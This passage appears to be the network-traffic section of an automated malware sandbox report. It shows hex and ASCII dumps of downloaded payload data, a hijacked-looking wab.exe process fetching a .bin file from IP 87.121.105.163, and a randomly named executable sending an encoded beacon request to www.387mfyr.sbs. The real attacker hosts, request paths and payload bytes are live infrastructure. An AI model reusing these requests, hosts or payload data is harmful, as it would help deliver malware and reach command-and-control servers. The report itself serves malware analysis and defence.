                                              Data Raw: 63 51 47 62 36 77 4a 32 67 37 74 69 74 41 73 41 36 77 4a 38 62 75 73 43 45 39 45 44 58 43 51 45 63 51 47 62 36 77 49 45 76 4c 6b 6f 50 33 75 32 36 77 4a 56 53 48 45 42 6d 34 48 78 59 65 57 42 70 33 45 42 6d 33 45 42 6d 34 48 78 53 64 72 36 45 58 45 42 6d 33 45 42 6d 2b 73 43 78 2f 6c 78 41 5a 75 36 55 35 41 62 4c 58 45 42 6d 33 45 42 6d 33 45 42 6d 33 45 42 6d 7a 48 4b 36 77 4b 78 49 2b 73 43 74 6a 32 4a 46 41 74 78 41 5a 76 72 41 6b 74 42 30 65 4a 78 41 5a 74 78 41 5a 75 44 77 51 54 72 41 73 33 64 63 51 47 62 67 66 6c 65 2f 76 77 43 66 4d 78 78 41 5a 76 72 41 6e 35 79 69 30 51 6b 42 4f 73 43 71 58 2f 72 41 6c 53 71 69 63 4e 78 41 5a 76 72 41 68 74 6f 67 63 4f 2b 5a 34 51 41 63 51 47 62 63 51 47 62 75 73 67 68 30 75 70 78 41 5a 76 72 41 73 72 78 67 66 4b 31 4b 65 4a 2b 36 77 4c 6a 6e 65 73 43 69 73 2b 42 77 6f 50 33 7a 32 76 72 41 72 65 52 63 51 47 62 63 51 47 62 63 51 47 62 36 77 4a 66 52 48 45 42 6d 34 73 4d 45 48 45 42 6d 33 45 42 6d 34 6b 4d 45 33 45 42 6d 33 45 42 6d 30 4c 72 41 6d 6f 73 63 51 47 62 67 66 6f 63 7a 77 51 41 64 64 64 78 41 5a 76 72 41 68 41 58 69 56 77 6b 44 48 45 42 6d 33 45 42 6d 34 48 74 41 41 4d 41 41 48 45 42 6d 2b 73 43 4c 39 69 4c 56 43 51 49 36 77 4a 54 4c 6e 45 42 6d 34 74 38 4a 41 52 78 41 5a 74 78 41 5a 75 4a 36 2b 73 43 65 69 31 78 41 5a 75 42 77 35 77 41 41 41 42 78 41 5a 74 78 41 5a 74 54 63 51 47 62 63 51 47 62 61 6b 44 72 41 6c 38 53 36 77 4a 44 6f 59 6e 72 36 77 49 47 7a 58 45 42 6d 38 65 44 41 41 45 41 41 41 44 41 43 77 50 72 41 6e 4e 38 36 77 4b 6d 6f 59 48 44 41 41 45 41 41 4f 73 43 6e 74 31 78 41 5a 74 54 63 51 47 62 36 77 4b 53 74 34 6e 72 63 51 47 62 63 51 47 62 69 62 73 45 41 51 41 41 36 77 4b 45 45 4f 73 43 4f 43 65 42 77 77 51 42 41 41 44 72 41 75 6f 44 36 77 4a 35 45 6c 4e 78 41 5a 76 72 41 73 2f 36 61 76 2f 72 41 72 6e 6c 63 51 47 62 67 38 49 46 36 77 49 53 32 48 45 42 6d 7a 48 32 36 77 4b 52 6e 48 45 42 6d 7a 48 4a 63 51 47 62 63 51 47 62 69 78 70 78 41 5a 76 72 41 74 4b 7a 51 65 73 43 6f 59 31 78 41 5a 73 35 48 41 70 31 38 33 45 42 6d 33 45 42 6d 30 5a 78 41 5a 74 78 41 5a 75 41 66 41 72 37 75 48 58 66 63 51 47 62 36 77 4b 47 30 6f 74 45 43 76 78 78 41 5a 74 78 41 5a 73 70 38 4f 73 43 35 32 35 78 41 5a 76 2f 30 75 73 43 76 68 37 72 41 70 48 73 75 68 7a 50 42 41 44 72 41 72 54 6e 63 51 47 62 4d 63 44 72 41 74 46 41 63 51 47 62 69 33 77 6b 44 4f 73 43 51 74 54 72 41 69 73 54 67 54 51 48 4a 6c 48 67 35 75 73 43 2b 34 48 72 41 6b 4c 6f 67 38 41 45 63 51 47 62 36 77 4b 69 30 7a 6e 51 64 65 50 72 41 70 52 4d 63 51 47 62 69 66 76 72 41 6f 55 34 63 51 47 62 2f 39 66 72 41 6a 55 77 63 51 47 62 51 4b 59 6a 58 56 49 48 58 6a 45 6b 70 6f 39 6e 32 49 33 67 35 69 5a 65 5a 42 71 59 56 65 43 34 72 37 52 70 73 34 62 72 71 51 6f 49 54 32 45 55 71 72 35 55 55 71 65 6a 46 76 6f 30 4d 47 45 6b 36 37 4b 58 30 67 2b 46 61 37 4f 47 75 76 79 71 36 6c 53 64 51 58 2f 4f 70 54 5a 71 41 31 66 46 44 65 79 42 31 36 52 75 7a 4b 66 78 6f 59 77 68 31 41 5a 6a 73 30 42 6f 49 6d 2f 44 36 4f 32 36 57 51 63 4c 2f 4e 45 61 32
                                              Data Ascii: cQGb6wJ2g7titAsA6wJ8busCE9EDXCQEcQGb6wIEvLkoP3u26wJVSHEBm4HxYeWBp3EBm3EBm4HxSdr6EXEBm3EBm+sCx/lxAZu6U5AbLXEBm3EBm3EBm3EBmzHK6wKxI+sCtj2JFAtxAZvrAktB0eJxAZtxAZuDwQTrAs3dcQGbgfle/vwCfMxxAZvrAn5yi0QkBOsCqX/rAlSqicNxAZvrAhtogcO+Z4QAcQGbcQGbusgh0upxAZvrAsrxgfK1KeJ+6wLjnesCis+BwoP3z2vrAreRcQGbcQGbcQGb6wJfRHEBm4sMEHEBm3EBm4kME3EBm3EBm0LrAmoscQGbgfoczwQAdddxAZvrAhAXiVwkDHEBm3EBm4HtAAMAAHEBm+sCL9iLVCQI6wJTLnEBm4t8JARxAZtxAZuJ6+sCei1xAZuBw5wAAABxAZtxAZtTcQGbcQGbakDrAl8S6wJDoYnr6wIGzXEBm8eDAAEAAADACwPrAnN86wKmoYHDAAEAAOsCnt1xAZtTcQGb6wKSt4nrcQGbcQGbibsEAQAA6wKEEOsCOCeBwwQBAADrAuoD6wJ5ElNxAZvrAs/6av/rArnlcQGbg8IF6wIS2HEBmzH26wKRnHEBmzHJcQGbcQGbixpxAZvrAtKzQesCoY1xAZs5HAp183EBm3EBm0ZxAZtxAZuAfAr7uHXfcQGb6wKG0otECvxxAZtxAZsp8OsC525xAZv/0usCvh7rApHsuhzPBADrArTncQGbMcDrAtFAcQGbi3wkDOsCQtTrAisTgTQHJlHg5usC+4HrAkLog8AEcQGb6wKi0znQdePrApRMcQGbifvrAoU4cQGb/9frAjUwcQGbQKYjXVIHXjEkpo9n2I3g5iZeZBqYVeC4r7Rps4brqQoIT2EUqr5UUqejFvo0MGEk67KX0g+Fa7OGuvyq6lSdQX/OpTZqA1fFDeyB16RuzKfxoYwh1AZjs0BoIm/D6O26WQcL/NEa2
                                              Apr 26, 2024 07:40:46.206619978 CEST1289INData Raw: 34 43 47 43 66 33 56 4d 66 79 65 56 6b 2f 50 50 6a 50 56 55 31 66 64 76 6c 2f 2b 43 6e 68 34 32 53 57 6e 6b 4e 77 45 62 37 39 68 46 39 79 2b 32 78 47 6a 6d 4e 6b 73 70 35 43 46 79 43 73 64 4a 36 49 72 55 57 63 49 73 74 69 47 59 2f 58 51 6c 4f 73
                                              Data Ascii: 4CGCf3VMfyeVk/PPjPVU1fdvl/+Cnh42SWnkNwEb79hF9y+2xGjmNksp5CFyCsdJ6IrUWcIstiGY/XQlOsmnCqJHTcXJ1dtYaIrUfPKezBhiitRvbZ+RWEnC26Z5ae4ydlfUmlra1Pg5qOKWYmFXXPe/tAR9YBwRGfPvgyndNAhDc5F+9+rHOLmJtptqyRR4JO71CEeHokc3uXUK2+jKeHmJtEfjqeoQgWuBml7alDg5h+C2Ap1
                                              Apr 26, 2024 07:40:46.206865072 CEST1289INData Raw: 33 48 6a 71 65 58 70 6b 4d 2f 72 4c 46 36 72 37 44 68 31 37 74 70 4f 4a 55 41 33 47 62 53 34 73 67 35 72 6f 39 31 44 61 55 65 46 43 72 58 57 4b 64 6f 4f 6d 2f 63 35 41 59 53 4b 4e 43 31 4c 34 76 41 44 35 66 46 4c 74 6f 73 41 57 49 76 32 4e 43 64
                                              Data Ascii: 3HjqeXpkM/rLF6r7Dh17tpOJUA3GbS4sg5ro91DaUeFCrXWKdoOm/c5AYSKNC1L4vAD5fFLtosAWIv2NCdmow94OYp3DpDJlG5YssPslyCokH+p6OKNZtnYQzoTvzIcc1pAS9GfYAfnpftYbapXumoLOao8W1PGcZuCJuTW/qxPc/0oxyIJzkU5cfug3WKP+l3RV/qAlhfVYbf5Q4L/d07hsUMBOCueSvxR+A+2iG7Nx/38+FzN
                                              Apr 26, 2024 07:40:46.206935883 CEST1289INData Raw: 2f 41 59 5a 6e 34 44 44 4c 43 76 6e 51 4a 68 4b 6a 47 4d 53 30 75 74 67 43 35 78 54 4d 32 52 5a 55 56 4b 49 66 68 37 75 31 2b 4b 76 39 2f 74 78 44 79 74 79 74 70 70 61 48 63 44 33 72 64 5a 4b 4e 6f 6e 72 6e 6c 71 4f 37 62 70 7a 78 42 4c 63 67 62
                                              Data Ascii: /AYZn4DDLCvnQJhKjGMS0utgC5xTM2RZUVKIfh7u1+Kv9/txDytytppaHcD3rdZKNonrnlqO7bpzxBLcgbFd5CW4lPdJ7GoviDGAYYQtlL3gDWgTqBHdn1BEyn9zQEkQ5fY2wutgG5zDM2RxfVpImqNZ312jRa4llyfp+JNMy6I2RWhCheIfOfjcXJ11tvt7kC4hKzNCNsZlWh7/C0BfEqfxmZ9G6Grt30BeBfQjPZ+GZ2/bF2P
                                              Apr 26, 2024 07:40:46.206950903 CEST1289INData Raw: 49 58 77 70 57 51 47 6d 42 4e 78 38 42 42 30 56 50 75 6b 38 47 59 59 72 43 39 4a 61 32 45 6c 4c 35 4b 63 73 6c 45 65 47 55 65 44 70 71 52 31 54 35 69 59 4a 5a 53 52 34 30 4f 54 43 61 6b 43 53 70 4b 64 6c 78 4d 74 54 51 74 64 6e 43 6e 56 57 4e 2b
                                              Data Ascii: IXwpWQGmBNx8BB0VPuk8GYYrC9Ja2ElL5KcslEeGUeDpqR1T5iYJZSR40OTCakCSpKdlxMtTQtdnCnVWN+2ctlgQIKFrp6cm5dETYSB9G2gIp6cfG0DJYRChSrjAr28WVi9UVWVMhMp7pEUN0ASVo8HZQm3Lc5hPD7wF4kgppNZsMRB3lA7uvo6NLhqJr+R15yZRE+nhY+DmJlHg5iZR4OYmUeDmJlHg5p4tkYw5s89Qru+t7bs
                                              Apr 26, 2024 07:40:46.207042933 CEST1289INData Raw: 41 67 33 47 68 6b 6a 32 32 49 68 32 6d 32 7a 62 65 4c 6d 4a 6c 37 68 4c 34 35 52 34 4f 59 6d 55 65 44 6d 4a 6c 48 67 35 69 5a 52 34 4f 59 6d 55 65 42 68 41 49 57 56 57 66 52 46 55 4f 31 61 4f 64 41 63 77 41 68 70 61 31 35 54 34 4f 61 66 56 54 43
                                              Data Ascii: Ag3Ghkj22Ih2m2zbeLmJl7hL45R4OYmUeDmJlHg5iZR4OYmUeBhAIWVWfRFUO1aOdAcwAhpa15T4OafVTCwvAFY5A/SdOMMs3msE6ld+UVkNFEk7bN6r7Lp5bvVIZs6PrcXh+5XN/Z0P3c2Ih0YO9nGCgjGE6gEUE42wbrl8eraRGwZyLwyTuDbIVd5Fd/3CtgYftARRchZCLaeYqqEHXwSx9NG1Zsr44fL4zA+oq9pMGB5N1Wm
                                              Apr 26, 2024 07:40:46.207109928 CEST1289INData Raw: 4a 52 59 79 49 65 41 31 71 73 72 6b 45 41 5a 38 77 46 6b 70 41 2b 30 42 49 51 4d 73 73 6e 73 62 72 59 42 2b 63 78 7a 49 62 66 38 53 37 75 70 4c 58 58 6f 37 71 51 64 43 4a 47 4f 79 62 37 4b 66 32 56 30 6a 62 79 66 51 68 71 79 50 6c 45 53 68 71 62
                                              Data Ascii: JRYyIeA1qsrkEAZ8wFkpA+0BIQMssnsbrYB+cxzIbf8S7upLXXo7qQdCJGOyb7Kf2V0jbyfQhqyPlEShqbzeZ32P/zi51biVWTYh+jkb+AH5q6DvbC5OZ16moVBUphDdrkqR+noo/GWZxhJbU5DfqnopRhtFixeq+w6f+7aSiZPBMxoVlczvk9DsHVEHxeEDjnAIYR1X0ogsa4Tvq6d6cdbBYkUghkAH2dg7ctL5bhUXzQxcBrV
                                              Apr 26, 2024 07:40:46.207139969 CEST1289INData Raw: 35 70 35 41 71 2f 6d 6d 73 59 53 65 46 72 6a 78 30 70 35 42 62 71 2f 42 45 59 52 65 69 78 50 66 6a 64 4d 31 70 42 43 64 62 66 57 50 75 4b 2f 38 37 64 52 77 42 50 57 32 52 71 30 38 2b 64 6e 6d 36 6c 61 68 42 47 6d 34 4e 76 58 55 48 45 73 62 4a 36
                                              Data Ascii: 5p5Aq/mmsYSeFrjx0p5Bbq/BEYReixPfjdM1pBCdbfWPuK/87dRwBPW2Rq08+dnm6lahBGm4NvXUHEsbJ6eeb2Vg7Yvix2KWjeaj6hQVvO0y6sbVPOtQovKfsTOYmURPmJlHvYmz94OZ/AVi2IIXw0/I/rWojYpOBRdjQWAed+4niseJ12nUZYPvGXxaCqv5pw/SLkarKyrRBcLDbdhczh50JaSF06/tdGg1hFHfR2GmnoyzSDe
                                              Apr 26, 2024 07:40:46.207187891 CEST1289INData Raw: 57 37 66 56 48 4b 32 39 70 37 37 34 35 55 77 70 73 56 2f 68 45 6c 59 79 70 36 43 49 66 4a 4e 6d 59 51 38 67 71 41 6b 6c 70 36 42 56 4d 44 39 4f 61 65 2f 6e 36 32 48 53 2f 4f 54 65 6a 52 52 51 6c 57 57 4e 6b 4b 63 67 48 51 6e 4b 48 4a 2b 6c 52 34
                                              Data Ascii: W7fVHK29p7745UwpsV/hElYyp6CIfJNmYQ8gqAklp6BVMD9Oae/n62HS/OTejRRQlWWNkKcgHQnKHJ+lR47AxFJefwYsJi2qTxYRAWl+9Rl9osW4VyZJPlQloKLt9HqgrVoKYvBtm3zi5iYCWzVvO0FnzUePkP7QE13v9Oln5X7/TBjY++cx8eDqhrB+Gse/cWM8WvajSku0cAIrQs1L+xoqG5kcKToQRU9/709a1HUyDVufu2+
                                              Apr 26, 2024 07:40:46.207205057 CEST1289INData Raw: 37 69 67 77 6d 2b 7a 73 57 32 72 33 75 48 6d 4a 70 31 50 61 73 6c 58 37 4b 4c 38 52 6f 73 4a 4d 79 31 38 77 6a 43 4b 43 69 38 4f 69 6c 74 68 50 7a 51 53 52 71 65 6a 7a 4d 4f 69 41 46 6b 66 79 79 37 46 5a 39 66 2f 55 6e 42 42 30 42 47 78 65 4c 69
                                              Data Ascii: 7igwm+zsW2r3uHmJp1PaslX7KL8RosJMy18wjCKCi8OilthPzQSRqejzMOiAFkfyy7FZ9f/UnBB0BGxeLiitLrYAu8szNkWWUIy7gZeqDmtJl8IT/8bdSayA4gw43chllNCRBpVofMkCD6CnGuwcAgkYBbl4mn4ooK6tJwLWuAf0BosJlHg6ai7f+ImC7kZkxHh5ia5PXkiUbJc00JPZKejgNyuJ2EUNJkEsqeT703UYGEUsNxW
                                              Apr 26, 2024 07:40:46.455882072 CEST1289INData Raw: 52 35 76 46 43 31 72 63 7a 6c 35 43 5a 52 74 6c 6a 37 38 32 50 4c 70 35 63 6d 57 4c 47 58 59 51 69 64 7a 76 6f 53 72 32 66 53 4a 71 73 70 5a 56 35 65 69 32 79 65 72 45 48 72 6b 4c 74 39 73 35 64 65 32 48 53 4d 57 50 73 2f 38 43 39 54 77 4d 48 43
                                              Data Ascii: R5vFC1rczl5CZRtlj782PLp5cmWLGXYQidzvoSr2fSJqspZV5ei2yerEHrkLt9s5de2HSMWPs/8C9TwMHC0HeXcfH70Z3gHbeUloF6eTaHuK/EAecmUVr6cOAWZ9Q6XnKKAVhsAVFn4/25DxkTn5K8zVS4KZH41eUVM/ewutgG7yDM2D5TdNPfU+xLUFe0gXW2ZeVRBV0l0oFnbhL1tc4XuvmXrZrcOwSY35KA1WgjuNCVBr6no


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.54972287.121.105.163801968C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 07:41:12.957057953 CEST172OUTGET /PUzAKuQ35.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: 87.121.105.163
                                              Cache-Control: no-cache
                                              Apr 26, 2024 07:41:13.191859961 CEST1289INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 05:41:13 GMT
                                              Server: Apache/2.4.41 (Ubuntu)
                                              Last-Modified: Thu, 25 Apr 2024 09:02:52 GMT
                                              ETag: "41e40-616e80d528700"
                                              Accept-Ranges: bytes
                                              Content-Length: 269888
                                              Content-Type: application/octet-stream
                                              Data Raw: 57 f4 35 60 17 dc 24 f6 08 dd 88 ed 12 04 33 33 87 fe 9f 4a 75 63 1d 49 f1 bb c0 b4 48 f3 5c 85 02 78 0f 04 84 b5 bd 25 7a 28 f1 2e a2 15 e7 eb 0e fb 22 32 95 8d a8 c0 fa 11 b9 8a 1e 35 13 5b bf 94 93 f1 7c 90 f5 d0 a2 81 ad e9 07 2c 87 d5 97 fc a2 49 ef c6 bf 84 2c 67 80 b3 f1 30 6a aa e2 5c 06 8e 6e 86 e2 78 62 4b 51 dc f2 6a b7 06 9f 84 23 65 c3 dd e5 e7 7d 71 2d 61 ee 1b d7 b6 e2 bb a6 29 c7 10 87 53 23 50 2e 4d f7 63 c2 bb 1b 5c a5 60 fe 93 2b 99 fe f9 9f 76 06 c9 3f 24 b8 79 f5 c8 cd f1 b3 83 14 94 4f 7e d9 f1 82 a3 98 a8 ac f6 7f 51 a8 82 27 17 e4 ae 1a f4 b5 8c fa 62 c2 93 40 ae 07 18 18 d0 0b d9 5a 88 5a d2 d8 8c 0d 6a d7 55 12 ca 39 76 1b ac d1 f8 3f 49 33 c3 b2 fb d1 cf 16 07 71 ec d3 a9 29 9f 44 7b c1 f7 8c a9 5c 9b b1 6c 94 fb 91 97 4e 43 4c 53 0b d9 9e 82 12 a4 27 2e 65 10 e7 ed c9 3f b9 5f c2 3d 5e ed 4a 02 d3 d3 35 8b ea 72 88 83 ba bc 3c 7c 00 7b 06 10 ef ad 45 2a 79 79 75 bf b8 c1 e7 00 dd 88 6a f7 b0 fa cb be 62 3e e8 ac b0 08 8b 2d 39 f7 6e f4 42 a2 db ea 97 3a da 3a 81 bb 96 f2 15 6f 05 37 cd b8 c5 92 1e 49 83 f4 9d 3f 47 e4 30 29 ee ef 84 5f f7 6e 1b 6a 66 17 65 ea 70 c6 b9 91 5d f7 1b 79 0d 3b cc 8a 03 40 d1 4e b9 a6 52 86 63 8f 00 c4 cb d4 1d 3d 33 43 4e da 90 6c ce 65 ae 2d 82 ad 08 22 62 c2 0a 79 f5 69 a2 3e ed 57 46 64 0c 59 08 6c ea bc 0c 6f 91 33 0f b2 d3 d1 c2 71 70 7f b8 97 3c 81 30 32 9b 3a 2b 6a 88 e4 02 8d 66 b6 be 90 44 94 2e e3 27 6f f6 00 2c 50 e3 d3 80 bc 6c 37 b8 31 42 4e bf 46 57 8f 3b 84 7b ed e4 8e 67 0b c7 d5 e2 af 0b 74 e5 76 28 03 25 3c b8 ad 70 56 d9 7f cc a6 bb 78 7f 10 d5 11 27 87 10 e7 07 7a 6f a8 fc 43 3f 46 b1 81 16 4a 29 0c 5f b1 f3 5c 33 0f 8b aa b5 ae 72 09 00 fd 06 d4 74 a4 fd 5c 70 24 ae 18 da e3 87 95 5f ef 8a 6f d8 df e7 7e 61 04 fc e4 f5 97 d2 7e b6 9d 7e a2 bb c8 9c cc 23 8f d5 b2 25 a6 db 42 05 3a 69 8d 26 6a bf 43 65 80 3c 56 17 61 e0 9b a3 9f 9e a5 fd 15 fb 8a 30 58 50 1a 7d 82 59 14 2f 90 71 10 31 a5 b0 88 1a bf a7 f6 29 0c a2 7f f3 01 d3 32 97 57 a6 d3 2e be 12 b5 72 f9 26 37 42 71 7f db 7a cc 85 63 e9 7d 08 25 f5 54 ec 36 f1 1a ca 87 c2 b5 8f 0b 59 76 08 81 0f 07 fd de 62 c1 7c 5e a2 3e d8 b0 3f 46 92 12 d0 10 cb 7d 67 52 1f 65 e7 13 6f b8 59 d0 bd aa cf 16 e9 ef c0 2a 73 b3 26 b3 b2 04 c0 cd 41 3e 07 dd 0d 0e d4 a7 1e 93 b9 d9 ab aa b2 c4 4f 8b 6e 4e 22 5c 35 7e 1c e6 f5 9e 5f ed 8a f1 51 16 9b 10 11 0a 86 3b d3 59 32 44 18 61 3b 04 f1 bf 5e 18 18 e6 9d e7 43 e3 55 be 7e 95 fa c2 15 33 7f 9d 32 30 c7 6c f5 93 14 af 07 f4 da e0 d6 de 56 45 a6 21 77 f9 3e 76 b9 c0 3f 72 43 e1 fd 4a 4a 83 72 61 3c d7 df 9b 9e 72 62 fc 29 57 d2 8b 85 a3 bf aa fb d1 9e 63 c5 f8 7f 0c 6c c8 79 d6 4e 9f c1 42 c0 cd b4 b1 a3 86 35 f8 d4 ed 20 39 d6 01 0b 30 b5 f7 e5 df 1b 6c ea 49 69 bf 7d 15 be 25 d0 25 68 d7 91 e5 46 9c 78 78 4f 0f 23 e5 9e 81 1d 4f f3 82 52 7b cd c9 dc 48 20 3f 68 c3 43 20 1d 58 d5 87 cd 94 50 db 39 45 50 ed 06 44 ff 16 c8 fa ab af 49 62 87 27 2d e3 13 ff 0f 53 df f7 b4 a3 ff 50 a4 f6 ba e4 11 9c 8b f8 9f 80 71 4f 22 08 5c 22 21 d1 81 c9 62 00 79 a3 45 db ae 82 0c 93 ce 72 dd a2 d2 b3 a0 3a 64 71 4e 8d dd 33 ff ba 98 b4 d8 89 a2 ab 9e d8 fb 33 29 b5 7f 1d 55 48 01 54 5e 04 89 16 bf 7c 7c 19 74 4e 07 7a
                                              Data Ascii: W5`$33JucIH\x%z(."25[|,I,g0j\nxbKQj#e}q-a)S#P.Mc\`+v?$yO~Q'b@ZZjU9v?I3q)D{\lNCLS'.e?_=^J5r<|{E*yyujb>-9nB::o7I?G0)_njfep]y;@NRc=3CNle-"byi>WFdYlo3qp<02:+jfD.'o,Pl71BNFW;{gtv(%<pVx'zoC?FJ)_\3rt\p$_o~a~~#%B:i&jCe<Va0XP}Y/q1)2W.r&7Bqzc}%T6Yvb|^>?F}gReoY*s&A>OnN"\5~_Q;Y2Da;^CU~320lVE!w>v?rCJJra<rb)WclyNB5 90lIi}%%hFxxO#OR{H ?hC XP9EPDIb'-SPqO"\"!byEr:dqN33)UHT^||tNz
                                              Apr 26, 2024 07:41:13.191960096 CEST1289INData Raw: 09 8f 9c 3d 1c b7 7b 7b c7 14 54 8a 5b 64 39 78 d1 5f 8d fb c7 68 77 23 52 e7 91 f9 8e 91 45 86 e6 77 dc fd 6b 22 21 a0 fb 93 8b d6 5f 31 a4 a5 0b c7 25 d6 77 f2 b5 cc 2b 84 06 9e 0e 56 a4 a3 b5 f0 1d ea 44 c6 15 8b 61 88 ac e2 99 43 1c ac 28 9d
                                              Data Ascii: ={{T[d9x_hw#REwk"!_1%w+VDaC(SRxO95EU3Yc0lE1vX:X\1S?$nN5!Q_~z"|RVO^8/o&}L3a#|%D;s'j#qPW|T<Kg
                                              Apr 26, 2024 07:41:13.192032099 CEST1289INData Raw: a7 f6 29 0c a2 7f f3 01 d3 32 97 57 a6 d3 2e be 12 b5 72 f9 26 37 42 71 7f db 7a cc 85 63 e9 7d 08 25 f5 54 ec 36 f1 1a ca 87 c2 b5 8f 0b 59 76 08 81 0f 07 fd de 62 c1 7c 5e a2 3e d8 b0 3f 46 92 12 d0 10 cb 7d 67 52 1f 65 e7 13 6f b8 59 d0 bd aa
                                              Data Ascii: )2W.r&7Bqzc}%T6Yvb|^>?F}gReoY*s&A>OnN"\5~_Q;Y2Da;^CU~320lVE!w>v?rCJJra<rb)WclyNB5 9
                                              Apr 26, 2024 07:41:13.192111015 CEST1289INData Raw: 23 85 b0 c1 14 ff 23 88 c1 f7 8c a9 5c 9b b1 6c c4 be 91 97 02 42 4d 53 bf dc 89 e0 12 a4 27 2e 65 10 e7 ed 29 3f bb 5e c9 3c 55 ed 4a 0e d7 d3 35 8b ea 72 88 83 ba bc bc 6e 00 7b 06 00 ef ad 45 0a 7d 79 75 bf f8 c1 e7 10 dd 88 6a f5 b0 fa cd be
                                              Data Ascii: ##\lBMS'.e)?^<UJ5rn{E}yujb>-9nB:8o79I?G )_njvep]y;@NRc=3CNle-"byi>WFdYlo3qp<02:+jfD.'o,Pl7
                                              Apr 26, 2024 07:41:13.192164898 CEST1289INData Raw: 53 43 6a af ea ae 98 6e 31 62 3a 20 e6 88 09 97 ad 21 4a 2f ca 5c 19 b5 5d 4d ce f8 a4 2e 8e b3 27 62 a0 e4 00 09 29 f9 fb 8f 8f f2 66 1b 0d ac 29 89 4e 2c e8 a6 85 3b ef 2e 2f 97 bb 32 cf 91 ae 6f 8a 31 83 7f 6c e7 64 c4 f3 85 22 d3 e0 41 5c 46
                                              Data Ascii: SCjn1b: !J/\]M.'b)f)N,;./2o1ld"A\FS54`dcvvQ%c>1'u@e, 1xqH?L9<(!%I:?Ett:sk1[O[^+>&E8-X];&e8wz(\kh
                                              Apr 26, 2024 07:41:13.192236900 CEST1289INData Raw: 0f e2 53 d7 22 4c 0c d8 eb df 31 13 ba 05 3f f1 40 ce fe f4 57 be ce 25 29 20 cf 56 c9 2c 8e 89 20 38 6c 19 ae 37 fb c3 ce 87 82 3a e0 b5 86 60 17 18 d8 50 ee e5 1f f3 6e 50 6e 49 8f 6d 17 6c 69 01 11 3d 56 d7 4b 92 e9 e0 ab b8 d4 0d bf 0e d1 f6
                                              Data Ascii: S"L1?@W%) V, 8l7:`PnPnImli=VKn'u%\V-^,&ncXNcKP;diDs[zft.W|2+T#1;}eCZjo,QHxohj}K[QL[R'iv
                                              Apr 26, 2024 07:41:13.192265987 CEST1289INData Raw: b8 59 ac 62 21 8a 1a da 3d 37 dc f8 ee 36 bc 1d f4 49 b8 c5 b7 b4 3d 0c 0e d4 94 e8 1a 3a 0d aa aa b2 fd 3a 0f 18 04 a9 21 3d f5 9f fa f4 9e 5f ab 00 f1 61 52 a5 ef 1e bc ca 05 2c d2 b1 58 19 61 3b 8e a1 be 6c c9 90 b2 a3 18 c8 60 49 bf 7e 95 70
                                              Data Ascii: Yb!=76I=::!=_aR,Xa;l`I~p~8v~LJwMp(sa<Wi"Z'Hcl6YuK9<#_DE\|fOlzr$%[!V!7WwUFX]-G>3/0gS
                                              Apr 26, 2024 07:41:13.192318916 CEST1289INData Raw: b8 74 12 8e ae 62 3e 63 e9 0c 8b 49 21 79 ca 10 85 42 a2 a7 32 1a 7f 66 b3 c4 0f ab 3c 20 6f 07 8e 43 0c c5 92 01 05 42 d7 6b b6 02 50 19 9e 3a fe 84 5f 81 22 f0 69 fb 5e 65 61 f7 da b8 91 5d b1 91 39 0e 0b 88 94 fc 4f 67 02 a7 59 d9 01 7f 8e 00
                                              Data Ascii: tb>cI!yB2f< oCBkP:_"i^ea]9OgYAoIy-'@#P5)VFdY:b2(dfKdLU$OX)t5t<%q@?o{*uxJAZkO
                                              Apr 26, 2024 07:41:13.192398071 CEST1289INData Raw: 40 98 b4 e3 ec a8 04 0e 73 f4 39 0e a3 9f d5 5e 1b 74 cd 4c 7c 7a cf ca 55 d4 f8 ce 18 c2 4e 12 04 63 56 4d e2 d0 42 7b ea e6 95 9a 6a bf 3a 9c b2 71 be d4 c8 38 02 94 44 f5 15 bc c2 34 ad a9 af aa d0 e4 9a 78 30 c7 c1 4e 4f a1 ed c7 7d d6 87 00
                                              Data Ascii: @s9^tL|zUNcVMB{j:q8D4x0NO}oz!U+@IDwE!VeBVrC{ZC5U")j#*e`Eb|)N#VP<Dx#`1!+v\bKQE~>#ez}Jn/QLfb+r=
                                              Apr 26, 2024 07:41:13.192462921 CEST1289INData Raw: 38 91 27 34 f1 f1 d8 13 5d 83 09 24 09 16 d9 f7 26 56 1e 96 56 4f 87 ce bb dd 18 27 ed 0b 3e 9d f1 c6 77 b9 8d 87 8d dc 7e d0 00 fa c8 18 51 a9 25 d6 dc 27 d1 3d cd 7e 27 62 b1 8f 49 fb 7c 0e 8f 7e 23 9e f5 df 4d 2d 29 56 64 05 8c 9a 82 ce 4b a2
                                              Data Ascii: 8'4]$&VVO'>w~Q%'=~'bI|~#M-)VdK"g yVU 1.X~9EsCYPHlFt5_Q;,FINzz0h4i+QF/s=#b]>2IGIQ;G|+@7"Q/9
                                              Apr 26, 2024 07:41:13.425635099 CEST1289INData Raw: 56 4c 0b 7e f5 74 d4 b8 32 75 b8 3c cf e7 0a 2b 4f 92 3c f0 2d 0b 17 24 54 ce 7c e0 9c e6 3d ac cc 2d 0d 3f bc 6a b8 ae c2 8b f9 24 c4 97 56 de 66 49 27 ec 26 d5 d7 74 7a 5c 04 71 fb d1 9e 3c 7d 61 72 0c 6c 71 e1 d6 4e 9f 2a 41 4d 84 b4 8a 7a 89
                                              Data Ascii: VL~t2u<+O<-$T|=-?j$VfI'&tz\q<}arlqN*AMzz!gmv;)aa-Qpx:ca2JD}]B+Q7X"&I"P@t`.U%M3tlM'$iNy)Gd`] IR4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.549723137.220.252.40805244C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 07:41:48.924058914 CEST459OUTGET /abt9/?Uzgp=d6Th&InLTkv7P=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA== HTTP/1.1
                                              Host: www.387mfyr.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-us
                                              Connection: close
